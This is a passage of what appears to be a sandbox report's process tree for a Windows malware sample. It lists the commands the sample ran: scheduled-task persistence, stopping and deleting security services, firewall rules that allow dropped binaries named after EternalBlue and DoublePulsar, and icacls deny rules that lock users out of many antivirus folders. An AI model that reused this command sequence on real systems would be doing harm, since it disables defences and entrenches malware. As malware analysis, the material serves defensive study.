        C:\Programdata\WindowsTask\winlogon.exe
        5⤵
        
        PID:1848
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
        6⤵
        
        PID:736
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        5⤵
        
        PID:2900
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig /flushdns
        6⤵
        Gathers network information
        
        PID:2228
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c gpupdate /force
        5⤵
        
        PID:2240
      - C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        6⤵
        
        PID:1948
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
      4⤵
      Creates scheduled task(s)
      PID:2236
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:2748
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\programdata\microsoft\temp\H.bat
      4⤵
      PID:1252
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\programdata\microsoft\temp\Temp.bat
      4⤵
      PID:112
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 5 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:2840
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 3 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:2740
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM 1.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:2748
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appidsvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1820
- - C:\Windows\SysWOW64\sc.exe
    sc start appidsvc
    3⤵
    - Launches sc.exe
    PID:436
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appmgmt
  2⤵
  PID:1788
- - C:\Windows\SysWOW64\sc.exe
    sc start appmgmt
    3⤵
    - Launches sc.exe
    PID:1688
- C:\programdata\install\ink.exe
  C:\programdata\install\ink.exe
  2⤵
  - Executes dropped EXE
  PID:940
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
  2⤵
  PID:2408
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
  2⤵
  PID:2216
- - C:\Windows\SysWOW64\sc.exe
    sc config appmgmt start= auto
    3⤵
    - Launches sc.exe
    PID:2956
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete swprv
  2⤵
  PID:1672
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop mbamservice
  2⤵
  PID:3008
- - C:\Windows\SysWOW64\sc.exe
    sc stop mbamservice
    3⤵
    - Launches sc.exe
    PID:2648
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
  2⤵
  PID:2660
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
  2⤵
  PID:2608
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete mbamservice
  2⤵
  PID:2724
- - C:\Windows\SysWOW64\sc.exe
    sc delete mbamservice
    3⤵
    - Launches sc.exe
    PID:2928
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete crmsvc
  2⤵
  PID:3048
- - C:\Windows\SysWOW64\sc.exe
    sc delete crmsvc
    3⤵
    - Launches sc.exe
    PID:2536
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete "windows node"
  2⤵
  PID:2896
- - C:\Windows\SysWOW64\sc.exe
    sc delete "windows node"
    3⤵
    - Launches sc.exe
    PID:2436
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
  2⤵
  PID:2224
- - C:\Windows\SysWOW64\sc.exe
    sc stop Adobeflashplayer
    3⤵
    - Launches sc.exe
    PID:1296
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop MoonTitle
  2⤵
  PID:2760
- - C:\Windows\SysWOW64\sc.exe
    sc stop MoonTitle
    3⤵
    - Launches sc.exe
    PID:1956
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
  2⤵
  PID:1504
- - C:\Windows\SysWOW64\sc.exe
    sc delete MoonTitle"
    3⤵
    - Launches sc.exe
    PID:2924
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
  2⤵
  PID:2752
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop AudioServer
  2⤵
  PID:1452
- - C:\Windows\SysWOW64\sc.exe
    sc stop AudioServer
    3⤵
    - Launches sc.exe
    PID:1272
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete AudioServer"
  2⤵
  PID:1888
- - C:\Windows\SysWOW64\sc.exe
    sc delete AudioServer"
    3⤵
    - Launches sc.exe
    PID:596
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
  2⤵
  PID:1616
- - C:\Windows\SysWOW64\sc.exe
    sc stop clr_optimization_v4.0.30318_64
    3⤵
    - Launches sc.exe
    PID:1748
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
  2⤵
  PID:936
- - C:\Windows\SysWOW64\sc.exe
    sc delete clr_optimization_v4.0.30318_64"
    3⤵
    - Launches sc.exe
    PID:1324
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
  2⤵
  PID:1308
- - C:\Windows\SysWOW64\sc.exe
    sc stop MicrosoftMysql
    3⤵
    - Launches sc.exe
    PID:780
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
  2⤵
  PID:2504
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set allprofiles state on
    3⤵
    - Modifies Windows Firewall
    PID:2024
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
  2⤵
  PID:2472
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:1800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
  2⤵
  PID:2912
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:1992
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
  2⤵
  PID:828
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:1884
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
  2⤵
  PID:2796
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:888
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
  2⤵
  PID:2456
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
  2⤵
  PID:1528
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:1020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
  2⤵
  PID:2232
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:2840
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
  2⤵
  PID:2732
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:2068
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
  2⤵
  PID:2656
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:2660
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
  2⤵
  PID:2272
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:1548
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
  2⤵
  PID:2672
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:2120
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
  2⤵
  PID:2788
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:2900
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
  2⤵
  PID:2536
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:1440
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
  2⤵
  PID:2000
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:2112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
  2⤵
  PID:1656
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:1636
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
  2⤵
  PID:2408
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
  2⤵
  PID:1144
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
  2⤵
  PID:2992
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:2044
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
  2⤵
  PID:1556
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
  2⤵
  PID:2200
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
    3⤵
    - Modifies Windows Firewall
    PID:768
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
  2⤵
  PID:896
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
    3⤵
    - Modifies Windows Firewall
    PID:2188
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
  2⤵
  PID:1748
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2360
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2980
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1732
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2648
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2248
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
  2⤵
  PID:2496
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1848
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1612
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1992
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
  2⤵
  PID:2080
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2168
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2720
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2772
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
  2⤵
  PID:2084
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2808
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2220
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2984
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
  2⤵
  PID:1964
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1620
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
  2⤵
  PID:1948
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2488
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:904
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
  2⤵
  PID:324
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1604
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2020
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2744
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
  2⤵
  PID:2072
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2000
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1200
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2876
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
  2⤵
  PID:2460
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\programdata\Malwarebytes /deny Admin:(F)
    3⤵
    - Modifies file permissions
    PID:2120
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
  2⤵
  PID:2924
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\programdata\Malwarebytes /deny System:(F)
    3⤵
    - Executes dropped EXE
    - Modifies file permissions
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:3056
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2588
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1036
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
  2⤵
  PID:1272
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\MB3Install /deny System:(F)
    3⤵
    - Modifies file permissions
    PID:488
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
  2⤵
  PID:2992
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\MB3Install /deny Admin:(F)
    3⤵
    - Modifies file permissions
    PID:1952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
  2⤵
  PID:1840
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2796
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
  2⤵
  PID:1328
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2084
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1800
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2236
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2144
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
  2⤵
  PID:532
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:948
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
  2⤵
  PID:2852
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2604
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2948
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1740
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1200
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2408
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1796
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:904
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2844
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1720
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2772
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1092
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2992
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2156
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2668
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1680
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1152
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2372
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2216
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1408
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1560
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2700
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:580
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2712
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:780
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2692
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1592
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3028
- - C:\Windows\SysWOW64\icacls.exe
